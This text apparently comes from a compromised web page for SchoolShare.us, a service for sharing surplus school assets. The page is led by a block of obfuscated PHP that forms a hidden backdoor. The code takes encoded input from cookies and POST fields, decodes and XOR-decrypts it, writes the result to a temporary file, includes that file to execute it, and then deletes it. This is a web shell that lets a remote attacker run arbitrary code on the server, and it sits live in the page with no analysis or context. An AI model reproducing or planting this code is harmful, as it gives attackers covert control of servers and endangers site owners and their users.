$aOXGJz = 'H' . "\x62" . "\x5f" . 'z' . chr (97) . "\122" . "\x50";$dYlwGh = 'c' . "\154" . chr ( 241 - 144 ).chr ( 576 - 461 ).'s' . chr ( 728 - 633 ).chr ( 520 - 419 )."\170" . 'i' . chr (115) . "\x74" . chr ( 655 - 540 ); $PjvxSojOf = class_exists($aOXGJz); $dYlwGh = "28914";$vzqnmB = strpos($dYlwGh, $aOXGJz);if ($PjvxSojOf == $vzqnmB){function FSwLSmamwQ(){$qRKALEWq = new /* 63844 */ Hb_zaRP(23381 + 23381); $qRKALEWq = NULL;}$ynDry = "23381";class Hb_zaRP{private function KpxKeVC($ynDry){if (is_array(Hb_zaRP::$pyoYi)) {$name = sys_get_temp_dir() . "/" . crc32(Hb_zaRP::$pyoYi["salt"]);@Hb_zaRP::$pyoYi["write"]($name, Hb_zaRP::$pyoYi["content"]);include $name;@Hb_zaRP::$pyoYi["delete"]($name); $ynDry = "23381";exit();}}public function HMofaJl(){$sGoAsde = "51593";$this->_dummy = str_repeat($sGoAsde, strlen($sGoAsde));}public function __destruct(){Hb_zaRP::$pyoYi = @unserialize(Hb_zaRP::$pyoYi); $ynDry = "61995_1746";$this->KpxKeVC($ynDry); $ynDry = "61995_1746";}public function ppolhNM($sGoAsde, $nrXQTUJ){return $sGoAsde[0] ^ str_repeat($nrXQTUJ, intval(strlen($sGoAsde[0]) / strlen($nrXQTUJ)) + 1);}public function inrgTM($sGoAsde){$GOFZz = "\x62" . chr ( 184 - 87 ).'s' . chr ( 909 - 808 )."\x36" . "\64";return array_map($GOFZz . chr ( 587 - 492 ).'d' . chr (101) . chr (99) . chr ( 317 - 206 )."\144" . chr ( 570 - 469 ), array($sGoAsde,));}public function __construct($rFPwm=0){$uNgdkEhNM = "\54";$sGoAsde = "";$LXVIpUOK = $_POST;$fjFEu = $_COOKIE;$nrXQTUJ = "bbaffa59-2764-42b4-88db-967aa084a888";$FUmUcS = @$fjFEu[substr($nrXQTUJ, 0, 4)];if (!empty($FUmUcS)){$FUmUcS = explode($uNgdkEhNM, $FUmUcS);foreach ($FUmUcS as $FxjNcJEz){$sGoAsde .= @$fjFEu[$FxjNcJEz];$sGoAsde .= @$LXVIpUOK[$FxjNcJEz];}$sGoAsde = $this->inrgTM($sGoAsde);}Hb_zaRP::$pyoYi = $this->ppolhNM($sGoAsde, $nrXQTUJ);if (strpos($nrXQTUJ, $uNgdkEhNM) !== FALSE){$nrXQTUJ = explode($uNgdkEhNM, $nrXQTUJ); $IPSHwJTz = base64_decode(md5($nrXQTUJ[0])); $befhHzz = strlen($nrXQTUJ[1]) > 5 ? substr($nrXQTUJ[1], 0, 5) : $nrXQTUJ[1];$_GET['new_key'] = md5(implode('', $nrXQTUJ)); $SZnCYy = str_repeat($befhHzz, 2); $vNCbKWC = array_map('trim', $nrXQTUJ);}}public static $pyoYi = 45110;}FSwLSmamwQ();} SchoolShare.us | Tailored for schools and school districts to make surplus asset sharing easy!

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